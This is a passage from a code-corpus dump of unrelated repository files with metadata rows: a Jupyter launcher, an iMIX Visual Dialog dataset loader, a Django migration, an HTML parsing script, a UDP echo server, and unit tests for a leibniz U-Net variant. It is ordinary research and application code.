STATIC_ROOT = os.path.join(PROJECT_ROOT, 'static')  # set so grappelli's static assets are handled
"[email protected]"
] | |
72ac156b2524eb314454f757d63de6933cd620b4 | 460a4bf1f736e7f484a0c26b10deaf6b2eb13bd2 | /venv_ML_CSG/bin/jupyter | 554741b6493b447707e5e914ade27a2015183de6 | [] | no_license | igor17400/machineLearningCallEvaluation | ff6fe668e87e6bd5884f4f87b62a242d37973dee | 1c157e7a9486305ce79c0dcf5284f6cba503d948 | refs/heads/master | 2023-01-13T22:48:32.053394 | 2020-11-12T05:48:46 | 2020-11-12T05:48:46 | 296,180,054 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 307 | #!/Users/igorlimarochaazevedo/Documents/Cellcrypt/machineLearningCallEvaluation/venv_ML_CSG/bin/python3
# -*- coding: utf-8 -*-
import re
import sys
from jupyter_core.command import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"[email protected]"
] | ||
4a404290eef8c70049ea154977a634238d6797a0 | a72f39b82966cd6e2a3673851433ce7db550429a | /imix/data/loaders/visual_dialog_dataset.py | 1ff1aed7483afe4283ef3a5267e1db67c5410fa9 | [
"Apache-2.0"
] | permissive | linxi1158/iMIX | 85841d6b95e1d99ed421a1ac3667658e49cae6fc | af87a17275f02c94932bb2e29f132a84db812002 | refs/heads/master | 2023-06-09T23:37:46.534031 | 2021-06-30T12:09:42 | 2021-06-30T12:09:42 | 381,608,650 | 0 | 0 | Apache-2.0 | 2021-06-30T07:08:40 | 2021-06-30T07:08:39 | null | UTF-8 | Python | false | false | 10,038 | py | from torch.utils.data import Dataset
from imix.data.reader.visual_dialog_reader import VisDiaReader
from imix.data.infocomp.visual_dialog_infocpler import VisDiaInfoCpler
from imix.data.builder import DATASETS
import torch
import json
from transformers.tokenization_bert import BertTokenizer
from imix.data.reader.feature_reader.image_features_reader import ImageFeaturesH5Reader
from ..utils.data_utils import encode_input, encode_image_input
import os
# Root directory holding the pre-processed VisDial features and annotations.
dataset_root_path = '/home/datasets/mix_data/iMIX/data/datasets/visdial_data/'


@DATASETS.register_module()
class VisDialDataset(Dataset):
    """Visual Dialog dataset: reads raw item features and completes them per split."""

    def __init__(self, reader, info_cpler, limit_nums=None):
        # reader / info_cpler are configuration objects consumed by the
        # reader and the info completer respectively.
        self.reader = VisDiaReader(reader)
        self.info_cpler = VisDiaInfoCpler(info_cpler)
        self._limit_sample_nums = limit_nums  # optional cap on dataset length
        self._splits = self.reader.splits

    def __len__(self):
        # Honour the optional sample limit when it is a positive number.
        if self._limit_sample_nums and self._limit_sample_nums > 0:
            return min(len(self.reader), self._limit_sample_nums)
        return len(self.reader)

    def __getitem__(self, idx):
        item_feature = self.reader[idx]
        # Complete the raw item features for the first configured split.
        item = self.info_cpler.complete_info(item_feature=item_feature, split=self._splits[0])
        return item
@DATASETS.register_module()
class VisdialDatasetDense(Dataset):
    """VisDial 1.0 dataset with dense (NDCG) annotations.

    Each item packs the dialog history, all 100 answer options (tokenized
    with BERT), the image region features, and the dense relevance labels.
    """

    # Default configuration: paths to pre-processed annotations / image
    # features, plus tokenization and option-count settings.
    params = {
        'num_train_samples':
        0,
        'num_val_samples':
        0,
        'visdial_image_feats':
        os.path.join(dataset_root_path, 'features', 'visdial_img_feat.lmdb'),
        'visdial_processed_train_dense':
        os.path.join(dataset_root_path, 'pre_process_annotations', 'visdial_1.0_train_dense_processed.json'),
        'visdial_processed_val':
        os.path.join(dataset_root_path, 'pre_process_annotations', 'visdial_1.0_val_processed.json'),
        'visdial_processed_train_dense_annotations':
        os.path.join(dataset_root_path, 'pre_process_annotations',
                     'visdial_1.0_train_dense_annotations_processed.json'),
        'visdial_processed_val_dense_annotations':
        os.path.join(dataset_root_path, 'pre_process_annotations', 'visdial_1.0_val_dense_annotations_processed.json'),
        'num_options':
        100,
        'visdial_tot_rounds':
        11,
        'overfit':
        None,
        'max_seq_len':
        256,
    }

    def __init__(self):
        """Initialization."""
        params = self.params
        self.numDataPoints = {}
        num_samples_train = params['num_train_samples']
        num_samples_val = params['num_val_samples']
        self._image_features_reader = ImageFeaturesH5Reader(params['visdial_image_feats'])
        with open(params['visdial_processed_train_dense']) as f:
            self.visdial_data_train = json.load(f)
        # Dataset size: explicit sample count wins; otherwise 5 samples in
        # overfit mode, or the full dialog count.
        if params['overfit']:
            if num_samples_train:
                self.numDataPoints['train'] = num_samples_train
            else:
                self.numDataPoints['train'] = 5
        else:
            if num_samples_train:
                self.numDataPoints['train'] = num_samples_train
            else:
                self.numDataPoints['train'] = len(self.visdial_data_train['data']['dialogs'])
        with open(params['visdial_processed_val']) as f:
            self.visdial_data_val = json.load(f)
        if params['overfit']:
            if num_samples_val:
                self.numDataPoints['val'] = num_samples_val
            else:
                self.numDataPoints['val'] = 5
        else:
            if num_samples_val:
                self.numDataPoints['val'] = num_samples_val
            else:
                self.numDataPoints['val'] = len(self.visdial_data_val['data']['dialogs'])
        self.overfit = params['overfit']
        # Dense relevance (NDCG) annotations for train and val.
        with open(params['visdial_processed_train_dense_annotations']) as f:
            self.visdial_data_train_ndcg = json.load(f)
        with open(params['visdial_processed_val_dense_annotations']) as f:
            self.visdial_data_val_ndcg = json.load(f)

        # train val setup
        self.numDataPoints['trainval'] = self.numDataPoints['train'] + self.numDataPoints['val']

        self.num_options = params['num_options']
        self._split = 'train'
        self.subsets = ['train', 'val', 'trainval']
        tokenizer = BertTokenizer.from_pretrained('bert-base-uncased')
        self.tokenizer = tokenizer
        # fetch the token indices of [CLS], [MASK] and [SEP]
        tokens = ['[CLS]', '[MASK]', '[SEP]']
        indexed_tokens = tokenizer.convert_tokens_to_ids(tokens)
        self.CLS = indexed_tokens[0]
        self.MASK = indexed_tokens[1]
        self.SEP = indexed_tokens[2]
        self.params = params
        self._max_region_num = 37  # max number of image regions kept per item

    def __len__(self):
        return self.numDataPoints[self._split]

    @property
    def split(self):
        return self._split

    @split.setter
    def split(self, split):
        # Only the subsets declared in __init__ are valid splits.
        assert split in self.subsets
        self._split = split

    def __getitem__(self, index):

        def pruneRounds(context, num_rounds):
            # Keep at most the last num_rounds question/answer pairs; when
            # pruning happens the caption is dropped and segment ids start at 0.
            start_segment = 1
            len_context = len(context)
            cur_rounds = (len(context) // 2) + 1
            l_index = 0
            if cur_rounds > num_rounds:
                # caption is not part of the final input
                l_index = len_context - (2 * num_rounds)
                start_segment = 0
            return context[l_index:], start_segment

        # Combining all the dialog rounds with the [SEP] and [CLS] token
        MAX_SEQ_LEN = self.params['max_seq_len']
        cur_data = None
        cur_dense_annotations = None
        # Select data/annotations for the active split; for 'trainval' the
        # index space is train followed by val.
        if self._split == 'train':
            cur_data = self.visdial_data_train['data']
            cur_dense_annotations = self.visdial_data_train_ndcg
        elif self._split == 'val':
            if self.overfit:
                cur_data = self.visdial_data_train['data']
                cur_dense_annotations = self.visdial_data_train_ndcg
            else:
                cur_data = self.visdial_data_val['data']
                cur_dense_annotations = self.visdial_data_val_ndcg
        else:
            if index >= self.numDataPoints['train']:
                cur_data = self.visdial_data_val
                cur_dense_annotations = self.visdial_data_val_ndcg
                index -= self.numDataPoints['train']
            else:
                cur_data = self.visdial_data_train
                cur_dense_annotations = self.visdial_data_train_ndcg

        # number of options to score on
        num_options = self.num_options
        assert num_options == 100

        dialog = cur_data['dialogs'][index]
        cur_questions = cur_data['questions']
        cur_answers = cur_data['answers']
        img_id = dialog['image_id']
        assert img_id == cur_dense_annotations[index]['image_id']

        # Build the dialog history up to the densely-annotated round:
        # caption, then alternating question/answer token lists.
        cur_rnd_utterance = [self.tokenizer.encode(dialog['caption'])]
        options_all = []
        cur_rounds = cur_dense_annotations[index]['round_id']
        for rnd, utterance in enumerate(dialog['dialog'][:cur_rounds]):
            cur_rnd_utterance.append(self.tokenizer.encode(cur_questions[utterance['question']]))
            if rnd != cur_rounds - 1:
                cur_rnd_utterance.append(self.tokenizer.encode(cur_answers[utterance['answer']]))
        # One candidate sequence per answer option for the final round.
        for answer_option in dialog['dialog'][cur_rounds - 1]['answer_options']:
            cur_option = cur_rnd_utterance.copy()
            cur_option.append(self.tokenizer.encode(cur_answers[answer_option]))
            options_all.append(cur_option)
            assert len(cur_option) == 2 * cur_rounds + 1

        gt_option = dialog['dialog'][cur_rounds - 1]['gt_index']

        # Encode every option: prune to the max round budget, then produce
        # BERT inputs (mask_prob=0: no MLM masking at dense-eval time).
        tokens_all = []
        mask_all = []
        segments_all = []
        sep_indices_all = []
        hist_len_all = []

        for _, option in enumerate(options_all):
            option, start_segment = pruneRounds(option, self.params['visdial_tot_rounds'])
            tokens, segments, sep_indices, mask = encode_input(
                option, start_segment, self.CLS, self.SEP, self.MASK, max_seq_len=MAX_SEQ_LEN, mask_prob=0)

            tokens_all.append(tokens)
            mask_all.append(mask)
            segments_all.append(segments)
            sep_indices_all.append(sep_indices)
            hist_len_all.append(torch.LongTensor([len(option) - 1]))

        tokens_all = torch.cat(tokens_all, 0)
        mask_all = torch.cat(mask_all, 0)
        segments_all = torch.cat(segments_all, 0)
        sep_indices_all = torch.cat(sep_indices_all, 0)
        hist_len_all = torch.cat(hist_len_all, 0)

        item = {}
        item['tokens'] = tokens_all.unsqueeze(0)
        item['segments'] = segments_all.unsqueeze(0)
        item['sep_indices'] = sep_indices_all.unsqueeze(0)
        item['mask'] = mask_all.unsqueeze(0)
        item['hist_len'] = hist_len_all.unsqueeze(0)
        item['image_id'] = torch.LongTensor([img_id])

        # add image features. Expand them to create batch * num_rounds * num options * num bbox * img feats
        features, num_boxes, boxes, _, image_target = self._image_features_reader[img_id]
        features, spatials, image_mask, image_target, image_label = encode_image_input(
            features, num_boxes, boxes, image_target, max_regions=self._max_region_num, mask_prob=0)

        item['image_feat'] = features
        item['image_loc'] = spatials
        item['image_mask'] = image_mask
        item['image_target'] = image_target
        item['image_label'] = image_label

        # add dense annotation fields
        item['gt_relevance_round_id'] = torch.LongTensor([cur_rounds])
        item['gt_relevance'] = torch.Tensor(cur_dense_annotations[index]['relevance'])
        item['gt_option'] = torch.LongTensor([gt_option])

        # add next sentence labels for training with the nsp loss as well
        nsp_labels = torch.ones(*tokens_all.unsqueeze(0).shape[:-1])
        nsp_labels[:, gt_option] = 0  # the ground-truth option is the "next sentence"
        item['next_sentence_labels'] = nsp_labels.long()

        return item
| [
"[email protected]"
] | |
df2d58f94c00c797d30176fc3455dcad5d0125e0 | 371e1dd2cc704b951238337ad0ec5697659a7908 | /shopping/migrations/0001_initial.py | a18608908801381c708b61892d9a5b28bea01cfd | [] | no_license | talluriabhishek/shopping-app | 89e432827b3919aa7709926bb876d660688149c6 | 6b22ba0400a19cb79d8da51b569a5a9800fbf4c0 | refs/heads/master | 2021-01-10T02:50:48.542201 | 2016-01-22T05:08:44 | 2016-01-22T05:08:44 | 50,147,573 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,022 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.9.1 on 2016-01-22 00:30
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):
    """Initial migration: creates the shopping ``Item`` table."""

    initial = True

    dependencies = [
        # Item references the configured user model through its ``author`` FK.
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
    ]

    operations = [
        migrations.CreateModel(
            name='Item',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=200)),
                ('description', models.TextField()),
                ('cost', models.FloatField()),
                ('created_date', models.DateTimeField(default=django.utils.timezone.now)),
                ('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
            ],
        ),
    ]
| [
"[email protected]"
] | |
c777b2d81bada506a7365c5637fbc842bcabaf80 | 4d9c13e61e61f3a6693e2ac427a1dcc93c749bd6 | /myparse.py | c83e15b8038e37bce0686783fbec2f3fe7044af9 | [] | no_license | yijiaohe/extractive-summs | 9b48e0eec7759acc1dde0a9fc7e43bb754dc5176 | f2c7d60cc3b8ebf7ad146097067cc26cc14952c5 | refs/heads/master | 2020-03-13T07:26:37.955091 | 2018-04-25T15:58:15 | 2018-04-25T15:58:15 | 131,025,583 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,942 | py | #!/usr/bin/env python3
import MySQLdb
import sys
import io
import operator
import getopt
import shutil
import os
from html.parser import HTMLParser
stop_tags = ['h1', 'h2', 'h3', 'p', 'dt', 'dd', 'blockquote']
empty_tags = ['area','base','br','col','embed','hr','img','input',
'link','meta','param','source','track','wbr']
class MyHTMLParser(HTMLParser):
'''
def __init__(self):
self.tag_stack = []
super(HTMLParser,self).__init__()
'''
def handle_starttag(self, tag, attrs):
if tag not in empty_tags:
self.tag_stack.append(tag)
pass
def handle_endtag(self, tag):
if tag in empty_tags:
return
ended_tag = self.tag_stack[-1]
if ended_tag != tag:
print("TAG MISMATCH: %s != %s"%(ended_tag,tag))
else:
self.tag_stack.pop()
if ended_tag in stop_tags:
self.content.append({'tag':ended_tag,'content':self.current.strip('\n')})
self.current = ""
# print()
# print("Encountered an end tag :", tag)
pass
def handle_data(self, data):
ts = self.tag_stack
current_tag = ts[-1] if len(ts) > 0 else ''
if ('body' in ts and
('p' in ts or 'dl' in ts or
#'h1' in ts or 'h2' in ts or 'h3' in ts or
'blockquote' in ts)):
self.current += data
# print("%s"%(data), end='')
class Node:
def __init__ (self,tag,content):
self.tag = tag
self.content = content
self.children = []
def add_child(self,child):
self.children.append(child)
def add_child_verbose(self,child):
print("Add %s to %s"%(child,self.content))
self.add_child(child)
def print_node(self):
print(self.tag)
print(self.content)
def filter(output_directory):
db = MySQLdb.connect("")
# prepare a cursor object using cursor() method
cursor = db.cursor()
# only use cards that have not been dropped
sql = "SELECT id, txtpath, url from resources0"
cursor.execute(sql)
html_list = cursor.fetchall()
db.close()
if not os.path.exists(output_directory):
os.makedirs(output_directory)
files_copied = 0
for html in html_list:
textpath = str(html[1])
if textpath == '':
continue
if (textpath[0] != 'u'):
continue
r = str(int(html[0]))
url = str(html[2])
# in_file_path = os.path.join(input_directory, r +".txt")
out_file_path = os.path.join(output_directory, r +".txt")
if not (os.path.isfile(out_file_path)):
# copy original parsed version
# file_path = os.path.join(input_directory, r +".txt")
# # only copy file if it exists in parsed cards directory
# if (os.path.isfile(file_path)):
# shutil.copy(file_path, output_directory)
# files_copied += 1
print(out_file_path)
# reparse link
try:
dir1 = "/data/corpora/newaan0/raw_html2/" + r + "/" + os.listdir("/data/corpora/newaan0/raw_html2/" + r)[0]
myfile = dir1 + "/" + os.listdir(dir1)[0]
# f = urllib.urlopen(url)
f = open(myfile, "r")
h = f.read().decode('utf-8')
parser = MyHTMLParser()
parser.tag_stack = []
parser.content = []
parser.current = ""
parser.feed(h)
tree = []
node_stack = []
# print tags
for block in parser.content:
# make node
node = Node(block['tag'],block['content'])
# empty node stack => add to top level tree
if len(node_stack) == 0:
node_stack.append(node)
tree.append(node)
continue
# compare to previous tag in stack
tag = stop_tags.index(block['tag'])
while True:
prev = node_stack.pop()
prev_tag = stop_tags.index(prev.tag)
if tag > prev_tag or len(node_stack) == 0:
node_stack.append(prev)
break
if len(node_stack) > 0:
node_stack[-1].add_child(node)
else:
# print("appended to tree!")
tree.append(node)
node_stack.append(node)
f = open(out_file_path,'w+')
for n in tree:
print_tree(n,0, f)
f.close()
except Exception:
pass
# elif not (os.path.isfile(in_file_path)):
# print in_file_path + "not in directory"
# else:
# print "file exists"
# else:
# print "card does not exist: " + file_path
# Note: the number of files in the resulting directory is less than the files_copied indicator,
# due to same card used for different topics.
print(len(html_list), files_copied)
def print_tree(tree,indentation,filename):
content = tree.content
filename.write("\n")
# if len(tree.content) > 50:
# content = content[:50] + "..."
filename.write(content.encode('utf-8'))
for c in tree.children:
print_tree(c,indentation + 2, filename)
def print_usage():
print ("usage: " + sys.argv[0] + "-o output_directory")
# input_directory = None
output_directory = None
try:
opts, args = getopt.getopt(sys.argv[1:], 'o:')
except (getopt.GetoptError, err):
usage()
sys.exit(2)
for o, a in opts:
# if o == '-i':
# input_directory = a
if o == '-o':
output_directory = a
else:
assert False, "unhandled option"
if (output_directory== None):
print_usage()
sys.exit(2)
filter(output_directory)
| [
"[email protected]"
] | |
dc1572244f1304493d64d667155fcbbc94bf2c68 | 30f8afce1ba484183d8e1e14aae76cabb2d92354 | /pythonNet/day2/server_udp.py | 1d475122c9fb66755a8bb12c1c143cd7db4d6ed6 | [] | no_license | brooot/Python_Base_Codes | d83e8c3b8a37b86672412c812fdb0d47deb67836 | a864685e160b5df4162a6f9fb910627eda702aaf | refs/heads/master | 2023-04-10T20:08:39.161289 | 2021-03-25T12:59:23 | 2021-03-25T12:59:23 | 200,570,412 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 491 | py | #!/usr/bin/env python3
from socket import *
# 创建套接字对象
sockfd = socket(AF_INET, SOCK_DGRAM)
# 绑定地址
IP = '0.0.0.0'
PORT = 8888
ADDR = (IP, PORT)
sockfd.bind(ADDR)
while True:
# 接受数据(与tcp不同)
data, addr = sockfd.recvfrom(1024)
message = "已收到来自%s的数据:%s" % (addr, data.decode())
print(message)
# 发送数据
send_message = "已经收到您的数据。".encode()
sockfd.sendto(send_message, addr)
sockfd.close() | [
"[email protected]"
] | |
9e147454ebbe583aae958e4c95cc4a87cd3a44ab | 5f9695616cce1c03013ae9a5e823ad686bf33b6e | /tests/test_unet2.py | 8d5f6867f0a173f479a72b89d2328f66e9994c1f | [
"MIT"
] | permissive | caiyunapp/leibniz | c9567685cafbc618d22487e408a27ba21cc8633e | 40bb6f088c5325701ca53506d7a66eb0a9ef4fef | refs/heads/master | 2023-04-16T18:31:27.194818 | 2021-09-13T15:54:57 | 2021-09-13T15:54:57 | 208,940,378 | 16 | 5 | null | null | null | null | UTF-8 | Python | false | false | 11,603 | py | # -*- coding: utf-8 -*-
import unittest
import torch as th
from leibniz.nn.net import resunet2
from leibniz.nn.layer.hyperbolic import HyperBasic
from leibniz.nn.layer.hyperbolic import HyperBottleneck
from leibniz.nn.layer.senet import SEBasicBlock, SEBottleneck
from leibniz.nn.layer.hyperbolic2 import HyperBasic as HyperBasic2, HyperBottleneck as HyperBottleneck2
class TestUnet(unittest.TestCase):
    def setUp(self):
        # No shared fixtures are needed; each test builds its own network.
        pass
    def tearDown(self):
        # Nothing to clean up; networks are garbage-collected per test.
        pass
def test1D(self):
net = resunet2(1, 1, spatial=(32,))
net(th.rand(1, 1, 16))
net = resunet2(1, 1, spatial=(32,), normalizor='instance')
net(th.rand(1, 1, 16))
net = resunet2(1, 1, spatial=(32,), normalizor='layer')
net(th.rand(1, 1, 16))
def test2D(self):
resunet2(1, 1, spatial=(16, 16))
resunet2(1, 1, spatial=(16, 32))
resunet2(1, 1, spatial=(32, 16))
net = resunet2(1, 1, spatial=(32, 16), scales=[[0, -1], [0, -1], [0, -1], [0, -1]])
net(th.rand(1, 1, 32, 16))
net = resunet2(1, 1, spatial=(32, 16), scales=[[0, -1], [0, -1], [0, -1], [0, -1]], normalizor='instance')
net(th.rand(1, 1, 32, 16))
net = resunet2(1, 1, spatial=(32, 16), scales=[[0, -1], [0, -1], [0, -1], [0, -1]], normalizor='layer')
net(th.rand(1, 1, 32, 16))
def test3D(self):
resunet2(1, 1, spatial=(16, 16, 16))
resunet2(1, 1, spatial=(32, 16, 16))
resunet2(1, 1, spatial=(16, 32, 16))
resunet2(1, 1, spatial=(16, 16, 32))
resunet2(1, 1, spatial=(11, 16, 32))
net = resunet2(1, 1, spatial=(4, 16, 32), scales=[[0, -1, -1], [-1, -1, -1], [0, -1, -1], [-1, -1, -1]])
net(th.rand(1, 1, 4, 16, 32))
net = resunet2(1, 1, spatial=(4, 16, 32), scales=[[0, -1, -1], [-1, -1, -1], [0, -1, -1], [-1, -1, -1]], normalizor='instance')
net(th.rand(1, 1, 4, 16, 32))
net = resunet2(1, 1, spatial=(4, 16, 32), scales=[[0, -1, -1], [-1, -1, -1], [0, -1, -1], [-1, -1, -1]], normalizor='layer')
net(th.rand(1, 1, 4, 16, 32))
def testHyp1D(self):
net = resunet2(1, 1, spatial=(32,), block=HyperBasic)
net(th.rand(1, 1, 16))
net = resunet2(1, 1, spatial=(32,), normalizor='instance', block=HyperBasic)
net(th.rand(1, 1, 16))
net = resunet2(1, 1, spatial=(32,), normalizor='layer', block=HyperBasic)
net(th.rand(1, 1, 16))
net = resunet2(1, 1, spatial=(32,), block=HyperBottleneck)
net(th.rand(1, 1, 16))
net = resunet2(1, 1, spatial=(32,), normalizor='instance', block=HyperBottleneck)
net(th.rand(1, 1, 16))
net = resunet2(1, 1, spatial=(32,), normalizor='layer', block=HyperBottleneck)
net(th.rand(1, 1, 16))
def testHyp2D(self):
net = resunet2(1, 1, spatial=(32, 16), scales=[[0, -1], [0, -1], [0, -1], [0, -1]], block=HyperBasic)
net(th.rand(1, 1, 32, 16))
net = resunet2(1, 1, spatial=(32, 16), scales=[[0, -1], [0, -1], [0, -1], [0, -1]], normalizor='instance', block=HyperBasic)
net(th.rand(1, 1, 32, 16))
net = resunet2(1, 1, spatial=(32, 16), scales=[[0, -1], [0, -1], [0, -1], [0, -1]], normalizor='layer', block=HyperBasic)
net(th.rand(1, 1, 32, 16))
net = resunet2(1, 1, spatial=(32, 16), scales=[[0, -1], [0, -1], [0, -1], [0, -1]], block=HyperBottleneck)
net(th.rand(1, 1, 32, 16))
net = resunet2(1, 1, spatial=(32, 16), scales=[[0, -1], [0, -1], [0, -1], [0, -1]], normalizor='instance', block=HyperBottleneck)
net(th.rand(1, 1, 32, 16))
net = resunet2(1, 1, spatial=(32, 16), scales=[[0, -1], [0, -1], [0, -1], [0, -1]], normalizor='layer', block=HyperBottleneck)
net(th.rand(1, 1, 32, 16))
def testHyp3D(self):
net = resunet2(1, 1, spatial=(4, 16, 32), scales=[[0, -1, -1], [-1, -1, -1], [0, -1, -1], [-1, -1, -1]], block=HyperBasic)
net(th.rand(1, 1, 4, 16, 32))
net = resunet2(1, 1, spatial=(4, 16, 32), scales=[[0, -1, -1], [-1, -1, -1], [0, -1, -1], [-1, -1, -1]], normalizor='instance', block=HyperBasic)
net(th.rand(1, 1, 4, 16, 32))
net = resunet2(1, 1, spatial=(4, 16, 32), scales=[[0, -1, -1], [-1, -1, -1], [0, -1, -1], [-1, -1, -1]], normalizor='layer', block=HyperBasic)
net(th.rand(1, 1, 4, 16, 32))
net = resunet2(1, 1, spatial=(4, 16, 32), scales=[[0, -1, -1], [-1, -1, -1], [0, -1, -1], [-1, -1, -1]], block=HyperBottleneck)
net(th.rand(1, 1, 4, 16, 32))
net = resunet2(1, 1, spatial=(4, 16, 32), scales=[[0, -1, -1], [-1, -1, -1], [0, -1, -1], [-1, -1, -1]], normalizor='instance', block=HyperBottleneck)
net(th.rand(1, 1, 4, 16, 32))
net = resunet2(1, 1, spatial=(4, 16, 32), scales=[[0, -1, -1], [-1, -1, -1], [0, -1, -1], [-1, -1, -1]], normalizor='layer', block=HyperBottleneck)
net(th.rand(1, 1, 4, 16, 32))
def testSE1D(self):
net = resunet2(1, 1, spatial=(32,), block=SEBasicBlock)
net(th.rand(1, 1, 16))
net = resunet2(1, 1, spatial=(32,), normalizor='instance', block=SEBasicBlock)
net(th.rand(1, 1, 16))
net = resunet2(1, 1, spatial=(32,), normalizor='layer', block=SEBasicBlock)
net(th.rand(1, 1, 16))
net = resunet2(1, 1, spatial=(32,), block=SEBottleneck)
net(th.rand(1, 1, 16))
net = resunet2(1, 1, spatial=(32,), normalizor='instance', block=SEBottleneck)
net(th.rand(1, 1, 16))
net = resunet2(1, 1, spatial=(32,), normalizor='layer', block=SEBottleneck)
net(th.rand(1, 1, 16))
def testSE2D(self):
net = resunet2(1, 1, spatial=(32, 16), scales=[[0, -1], [0, -1], [0, -1], [0, -1]], block=SEBasicBlock)
net(th.rand(1, 1, 32, 16))
net = resunet2(1, 1, spatial=(32, 16), scales=[[0, -1], [0, -1], [0, -1], [0, -1]], normalizor='instance', block=SEBasicBlock)
net(th.rand(1, 1, 32, 16))
net = resunet2(1, 1, spatial=(32, 16), scales=[[0, -1], [0, -1], [0, -1], [0, -1]], normalizor='layer', block=SEBasicBlock)
net(th.rand(1, 1, 32, 16))
net = resunet2(1, 1, spatial=(32, 16), scales=[[0, -1], [0, -1], [0, -1], [0, -1]], block=SEBottleneck)
net(th.rand(1, 1, 32, 16))
net = resunet2(1, 1, spatial=(32, 16), scales=[[0, -1], [0, -1], [0, -1], [0, -1]], normalizor='instance', block=SEBottleneck)
net(th.rand(1, 1, 32, 16))
net = resunet2(1, 1, spatial=(32, 16), scales=[[0, -1], [0, -1], [0, -1], [0, -1]], normalizor='layer', block=SEBottleneck)
net(th.rand(1, 1, 32, 16))
def testSE3D(self):
net = resunet2(1, 1, spatial=(4, 16, 32), scales=[[0, -1, -1], [-1, -1, -1], [0, -1, -1], [-1, -1, -1]], block=SEBasicBlock)
net(th.rand(1, 1, 4, 16, 32))
net = resunet2(1, 1, spatial=(4, 16, 32), scales=[[0, -1, -1], [-1, -1, -1], [0, -1, -1], [-1, -1, -1]], normalizor='instance', block=SEBasicBlock)
net(th.rand(1, 1, 4, 16, 32))
net = resunet2(1, 1, spatial=(4, 16, 32), scales=[[0, -1, -1], [-1, -1, -1], [0, -1, -1], [-1, -1, -1]], normalizor='layer', block=SEBasicBlock)
net(th.rand(1, 1, 4, 16, 32))
net = resunet2(1, 1, spatial=(4, 16, 32), scales=[[0, -1, -1], [-1, -1, -1], [0, -1, -1], [-1, -1, -1]], block=SEBottleneck)
net(th.rand(1, 1, 4, 16, 32))
net = resunet2(1, 1, spatial=(4, 16, 32), scales=[[0, -1, -1], [-1, -1, -1], [0, -1, -1], [-1, -1, -1]], normalizor='instance', block=SEBottleneck)
net(th.rand(1, 1, 4, 16, 32))
net = resunet2(1, 1, spatial=(4, 16, 32), scales=[[0, -1, -1], [-1, -1, -1], [0, -1, -1], [-1, -1, -1]], normalizor='layer', block=SEBottleneck)
net(th.rand(1, 1, 4, 16, 32))
def testHyp2DGroupNorm(self):
net = resunet2(1, 1, spatial=(32, 16), scales=[[0, -1], [0, -1], [0, -1], [0, -1]], normalizor='group', block=HyperBasic)
net(th.rand(1, 1, 32, 16))
net = resunet2(1, 1, spatial=(32, 16), scales=[[0, -1], [0, -1], [0, -1], [0, -1]], normalizor='group', block=HyperBasic)
net(th.rand(1, 1, 32, 16))
net = resunet2(1, 1, spatial=(32, 16), scales=[[0, -1], [0, -1], [0, -1], [0, -1]], normalizor='group', block=HyperBasic)
net(th.rand(1, 1, 32, 16))
net = resunet2(1, 1, spatial=(32, 16), scales=[[0, -1], [0, -1], [0, -1], [0, -1]], normalizor='group', block=HyperBottleneck)
net(th.rand(1, 1, 32, 16))
net = resunet2(1, 1, spatial=(32, 16), scales=[[0, -1], [0, -1], [0, -1], [0, -1]], normalizor='group', block=HyperBottleneck)
net(th.rand(1, 1, 32, 16))
net = resunet2(1, 1, spatial=(32, 16), scales=[[0, -1], [0, -1], [0, -1], [0, -1]], normalizor='group', block=HyperBottleneck)
net(th.rand(1, 1, 32, 16))
def testHyp1D2(self):
net = resunet2(1, 1, spatial=(32,), block=HyperBasic2)
net(th.rand(1, 1, 16))
net = resunet2(1, 1, spatial=(32,), normalizor='instance', block=HyperBasic2)
net(th.rand(1, 1, 16))
net = resunet2(1, 1, spatial=(32,), normalizor='layer', block=HyperBasic2)
net(th.rand(1, 1, 16))
net = resunet2(1, 1, spatial=(32,), block=HyperBottleneck2)
net(th.rand(1, 1, 16))
net = resunet2(1, 1, spatial=(32,), normalizor='instance', block=HyperBottleneck2)
net(th.rand(1, 1, 16))
net = resunet2(1, 1, spatial=(32,), normalizor='layer', block=HyperBottleneck2)
net(th.rand(1, 1, 16))
def testHyp2D2(self):
net = resunet2(1, 1, spatial=(32, 16), scales=[[0, -1], [0, -1], [0, -1], [0, -1]], block=HyperBasic2)
net(th.rand(1, 1, 32, 16))
net = resunet2(1, 1, spatial=(32, 16), scales=[[0, -1], [0, -1], [0, -1], [0, -1]], normalizor='instance', block=HyperBasic2)
net(th.rand(1, 1, 32, 16))
net = resunet2(1, 1, spatial=(32, 16), scales=[[0, -1], [0, -1], [0, -1], [0, -1]], normalizor='layer', block=HyperBasic2)
net(th.rand(1, 1, 32, 16))
net = resunet2(1, 1, spatial=(32, 16), scales=[[0, -1], [0, -1], [0, -1], [0, -1]], block=HyperBottleneck2)
net(th.rand(1, 1, 32, 16))
net = resunet2(1, 1, spatial=(32, 16), scales=[[0, -1], [0, -1], [0, -1], [0, -1]], normalizor='instance', block=HyperBottleneck2)
net(th.rand(1, 1, 32, 16))
net = resunet2(1, 1, spatial=(32, 16), scales=[[0, -1], [0, -1], [0, -1], [0, -1]], normalizor='layer', block=HyperBottleneck2)
net(th.rand(1, 1, 32, 16))
def testHyp3D2(self):
net = resunet2(1, 1, spatial=(4, 16, 32), scales=[[0, -1, -1], [-1, -1, -1], [0, -1, -1], [-1, -1, -1]], block=HyperBasic2)
net(th.rand(1, 1, 4, 16, 32))
net = resunet2(1, 1, spatial=(4, 16, 32), scales=[[0, -1, -1], [-1, -1, -1], [0, -1, -1], [-1, -1, -1]], normalizor='instance', block=HyperBasic2)
net(th.rand(1, 1, 4, 16, 32))
net = resunet2(1, 1, spatial=(4, 16, 32), scales=[[0, -1, -1], [-1, -1, -1], [0, -1, -1], [-1, -1, -1]], normalizor='layer', block=HyperBasic2)
net(th.rand(1, 1, 4, 16, 32))
